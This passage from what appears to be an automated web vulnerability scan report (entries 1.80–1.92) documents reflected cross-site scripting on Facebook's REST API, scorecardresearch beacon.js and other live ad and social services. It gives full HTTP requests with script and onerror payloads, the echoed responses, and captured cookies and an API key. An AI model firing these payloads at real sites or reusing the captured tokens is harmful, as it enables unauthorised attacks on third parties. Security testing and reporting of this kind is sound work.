Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=794;c=529/16;s=5;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: respondentId=ec3090ffba90412a8149082ce035a177; respondentEmail=""; IgUsFjsrORc3NyILDBo6HychGw%3D%3D=EyADRWJEY0NpdVl%2BSWFG; Mlo9CTINKhomHCQJNys5Fzc3Igs%3D=dkd8VQ%3D%3D; Mlo9CTINKhomHCQJNysrEzEh=EwwpRRURLVJ1dkl%2FVWJFb0Nyfl1%2BX2BGbzUIEEJ9UGBEb1oMKg0kBHMnOxMrIAg%2FAXMgJh8gbQ%3D%3D%0A; IBogOiIBKgExLQYjCzIdPRcaNwEiEj0rfkJ2c1E%3D=dQ%3D%3D; pixel_681051260=1; pixel_7668dede487ec485)(sn=*=1; pixel_a11059176=1

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Mon, 14 Feb 2011 01:37:25 GMT
Content-Type: text/xml
Connection: keep-alive
Set-Cookie: pixel_64105156860c4a<a>9e2f8f9272e=1; Expires=Tue, 14-Feb-2012 01:37:25 GMT
Content-Length: 55

// DIMESTORE PIXEL OK -- 64105156860c4a<a>9e2f8f9272e

1.80. http://api.echoenabled.com/v1/search [q parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://api.echoenabled.com
Path:	/v1/search

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload befc2<a>168ce8e9d57 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /v1/search?callback=jsonp1297694123476&q=childrenof%3Ahttp%3A%2F%2Fwww.aboutecho.com%2Fe2%2Ftweets%2Fe2launch+user.id%3Awww.twitter.com%2Fchrissaad%2Cwww.twitter.com%2Fcailloux2007%2Cwww.twitter.com%2Fwadcom%2Cwww.twitter.com%2Flevwalkin%2Cwww.twitter.com%2Fechoenabled%2Cwww.twitter.com%2Fechostatus%2Cwww.twitter.com%2Fkhrisloux+tags%3Aecho+-state%3ASystemFlagged%2CModeratorDeleted+children+-state%3ASystemFlagged%2CModeratorDeleted+sortOrder%3AreverseChronological+itemsPerPage%3A4+sanitizeHTML%3Afalse+befc2<a>168ce8e9d57&appkey=prod.echocorp HTTP/1.1
Host: api.echoenabled.com
Proxy-Connection: keep-alive
Referer: http://aboutecho.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Server: Yaws/1.85 Yet Another Web Server
Date: Mon, 14 Feb 2011 14:34:44 GMT
Content-Length: 139
Content-Type: application/x-javascript; charset="utf-8"

jsonp1297694123476({ "result": "error", "errorCode": "wrong_query", "errorMessage": "Parse error near: \"befc2<a>168ce8e9d57\" at 424" });

1.81. http://api.facebook.com/restserver.php [method parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.facebook.com
Path:	/restserver.php

Issue detail

The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 51f5d<img%20src%3da%20onerror%3dalert(1)>50bd65752c8 was submitted in the method parameter. This input was echoed as 51f5d<img src=a onerror=alert(1)>50bd65752c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?v=1.0&method=links.getStats51f5d<img%20src%3da%20onerror%3dalert(1)>50bd65752c8&urls=%5B%22http%3A%2F%2Fwww.legacy.com%2Flegacies%2F2011%2Fobituary-photo-gallery.aspx%3Fphoto%3Dbetty-garrette96f0%2522style%253d%2522x%253aexpression(alert(1))%2522520eb12a7af%26pid%3D148615818%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/legacies/2011/obituary-photo-gallery.aspx?photo=betty-garrette96f0%22style%3d%22x%3aexpression(alert(1))%22520eb12a7af&pid=148615818
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dexaminer.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.examiner.com%252Fnational%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: text/javascript;charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Cnection: close
Date: Mon, 14 Feb 2011 01:29:50 GMT
Content-Length: 466

fb_sharepro_render({"error_code":3,"error_msg":"Unknown method","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats51f5d<img src=a onerror=alert(1)>50bd65752c8"},{"key":"urls","value":"[\"http:\/\/www.legacy.com\/legacies\/2011\/obituary-photo-gallery.aspx?photo=betty-garrette96f0%22style%3d%22x%3aexpression(alert(1))%22520eb12a7af&pid=148615818\"]"},{"key":
...[SNIP]...

1.82. http://api.facebook.com/restserver.php [method parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.facebook.com
Path:	/restserver.php

Issue detail

The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 1ca06<img%20src%3da%20onerror%3dalert(1)>7fc4ebab431e57952 was submitted in the method parameter. This input was echoed as 1ca06<img src=a onerror=alert(1)>7fc4ebab431e57952 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /restserver.php?method=fql.query&query=SELECT%20name%2Cpic_small%2Cuid%20from%20user%20WHERE%20uid%20IN%20(1292387673)&method=fql.query1ca06<img%20src%3da%20onerror%3dalert(1)>7fc4ebab431e57952&api_key=54cc5dbde0acea15cbf544d4e434acc0&format=JSON&call_id=599&v=1.0 HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/Y7YCBKX-HZn.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dexaminer.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.examiner.com%252Fnational%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: application/json
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Cnection: close
Date: Mon, 14 Feb 2011 01:38:38 GMT
Content-Length: 388

{"error_code":3,"error_msg":"Unknown method","request_args":[{"key":"method","value":"fql.query1ca06<img src=a onerror=alert(1)>7fc4ebab431e57952"},{"key":"query","value":"SELECT name,pic_small,uid from user WHERE uid IN (1292387673)"},{"key":"api_key","value":"54cc5dbde0acea15cbf544d4e434acc0"},{"key":"format","value":"JSON"},{"key":"call_id",
...[SNIP]...

1.83. http://api.facebook.com/restserver.php [query parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.facebook.com
Path:	/restserver.php

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload d807b<img%20src%3da%20onerror%3dalert(1)>86106d539e46377d1 was submitted in the query parameter. This input was echoed as d807b<img src=a onerror=alert(1)>86106d539e46377d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /restserver.php?method=fql.query&query=SELECT%20name%2Cpic_small%2Cuid%20from%20user%20WHERE%20uid%20IN%20(1292387673)d807b<img%20src%3da%20onerror%3dalert(1)>86106d539e46377d1&method=fql.query&api_key=54cc5dbde0acea15cbf544d4e434acc0&format=JSON&call_id=599&v=1.0 HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/Y7YCBKX-HZn.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dexaminer.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.examiner.com%252Fnational%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: application/json
Expires: Sun, 13 Feb 2011 17:39:13 -0800
Pragma:
X-Cnection: close
Date: Mon, 14 Feb 2011 01:38:13 GMT
Content-Length: 424

{"error_code":601,"error_msg":"Parser error: unexpected 'd807b' at position 61.","request_args":[{"key":"method","value":"fql.query"},{"key":"query","value":"SELECT name,pic_small,uid from user WHERE uid IN (1292387673)d807b<img src=a onerror=alert(1)>86106d539e46377d1"},{"key":"api_key","value":"54cc5dbde0acea15cbf544d4e434acc0"},{"key":"format","value":"JSON"},{"key":"call_id","value":"599"},{"key":"v","value":"1.0"}]}

1.84. http://api.facebook.com/restserver.php [urls parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.facebook.com
Path:	/restserver.php

Issue detail

The value of the urls request parameter is copied into the HTML document as plain text between tags. The payload ec7bd<img%20src%3da%20onerror%3dalert(1)>a0b94148a55 was submitted in the urls parameter. This input was echoed as ec7bd<img src=a onerror=alert(1)>a0b94148a55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.legacy.com%2Flegacies%2F2011%2Fobituary-photo-gallery.aspx%3Fphoto%3Dbetty-garrette96f0%2522style%253d%2522x%253aexpression(alert(1))%2522520eb12a7af%26pid%3D148615818%22%5Dec7bd<img%20src%3da%20onerror%3dalert(1)>a0b94148a55&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/legacies/2011/obituary-photo-gallery.aspx?photo=betty-garrette96f0%22style%3d%22x%3aexpression(alert(1))%22520eb12a7af&pid=148615818
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dexaminer.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.examiner.com%252Fnational%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Sun, 13 Feb 2011 17:32:01 -0800
Pragma:
X-Cnection: close
Date: Mon, 14 Feb 2011 01:30:01 GMT
Content-Length: 482

fb_sharepro_render({"error_code":114,"error_msg":"param urls must be an array.","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats"},{"key":"urls","value":"[\"http:\/\/www.legacy.com\/legacies\/2011\/obituary-photo-gallery.aspx?photo=betty-garrette96f0%22style%3d%22x%3aexpression(alert(1))%22520eb12a7af&pid=148615818\"]ec7bd<img src=a onerror=alert(1)>a0b94148a55"},{"key":"format","value":"json"},{"key":"callback","value":"fb_sharepro_render"}]});

1.85. http://api.js-kit.com/v1/count [q parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://api.js-kit.com
Path:	/v1/count

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload d0e85<a>179ca1bd15e was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /v1/count?q=d0e85<a>179ca1bd15e&callback=Reuters.utils.socialCallback&appkey=prod.reuters.com HTTP/1.1
Host: api.js-kit.com
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Server: Yaws/1.85 Yet Another Web Server
Date: Mon, 14 Feb 2011 01:36:03 GMT
Content-Length: 148
Content-Type: application/x-javascript; charset="utf-8"

Reuters.utils.socialCallback({ "result": "error", "errorCode": "wrong_query", "errorMessage": "Parse error near: \"d0e85<a>179ca1bd15e\" at 19" });

1.86. http://ar.voicefive.com/b/rc.pli [func parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 56ff7<script>alert(1)</script>c505676b722 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction56ff7<script>alert(1)</script>c505676b722&n=ar_int_p85001580&1297650567782 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.8;sz=160x600;click0=http://a.tribalfusion.com/h.click/atmNvBUVn55rymoWArXTew3dYHPVjC2mMLpHEyVHbaXrfcYF7l0a6pPrJFTbv4THYWmbZbuQFZbmXTQt5TUk4Ev3oTBIYUJ8WHbXmAQCmV7tmWrJ3TUl5teo5mBZbnFbZaXsbQXs3Y1c7npEbP3br5Wr7DVAMTRHvguWoXW8/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SDYN_2011Q1/160/L41/446634589/x90/USNetwork/RS_SDYN_2011Q1_TF_PR_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/160/L44/1473307965/x90/USNetwork/RS_SELL_2011Q1_TF_CT_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1473307965?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de) ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_s_p84053757=1->1297606675; ar_p84053757=exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&; ar_p85001580=exp=53&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Feb 14 02:28:38 2011&prad=58087461&arc=40400763&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1297650518%2E886%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 14 Feb 2011 02:28:49 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction56ff7<script>alert(1)</script>c505676b722("");

1.87. http://b.scorecardresearch.com/beacon.js [c1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload a8148<script>alert(1)</script>634abd05f4d was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3a8148<script>alert(1)</script>634abd05f4d&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=57892644&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:36 GMT
Date: Mon, 14 Feb 2011 01:26:36 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3a8148<script>alert(1)</script>634abd05f4d", c2:"6035338", c3:".uy!", c4:".id!", c5:"57892644", c6:"", c10:"", c15:"", c16:"", r:""});

1.88. http://b.scorecardresearch.com/beacon.js [c10 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 1a8b2<script>alert(1)</script>16a0b4321e1 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12414&c5=&c6=&c10=31476441a8b2<script>alert(1)</script>16a0b4321e1&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:40 GMT
Date: Mon, 14 Feb 2011 01:26:40 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12414", c5:"", c6:"", c10:"31476441a8b2<script>alert(1)</script>16a0b4321e1", c15:"", c16:"", r:""});

1.89. http://b.scorecardresearch.com/beacon.js [c15 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 7aa03<script>alert(1)</script>33d2ba5508b was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12414&c5=&c6=&c10=3147644&c15=7aa03<script>alert(1)</script>33d2ba5508b HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:40 GMT
Date: Mon, 14 Feb 2011 01:26:40 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12414", c5:"", c6:"", c10:"3147644", c15:"7aa03<script>alert(1)</script>33d2ba5508b", c16:"", r:""});

1.90. http://b.scorecardresearch.com/beacon.js [c2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload efa2b<script>alert(1)</script>b32d71508fc was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338efa2b<script>alert(1)</script>b32d71508fc&c3=%EBuy!&c4=%ECid!&c5=57892644&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:36 GMT
Date: Mon, 14 Feb 2011 01:26:36 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338efa2b<script>alert(1)</script>b32d71508fc", c3:".uy!", c4:".id!", c5:"57892644", c6:"", c10:"", c15:"", c16:"", r:""});

1.91. http://b.scorecardresearch.com/beacon.js [c3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 2bc3f<script>alert(1)</script>8a89c7c3d07 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!2bc3f<script>alert(1)</script>8a89c7c3d07&c4=%ECid!&c5=57892644&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:36 GMT
Date: Mon, 14 Feb 2011 01:26:36 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!2bc3f<script>alert(1)</script>8a89c7c3d07", c4:".id!", c5:"57892644", c6:"", c10:"", c15:"", c16:"", r:""});

1.92. http://b.scorecardresearch.com/beacon.js [c4 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload ecbe3<script>alert(1)</script>19cfb851d89 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!ecbe3<script>alert(1)</script>19cfb851d89&c5=57892644&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
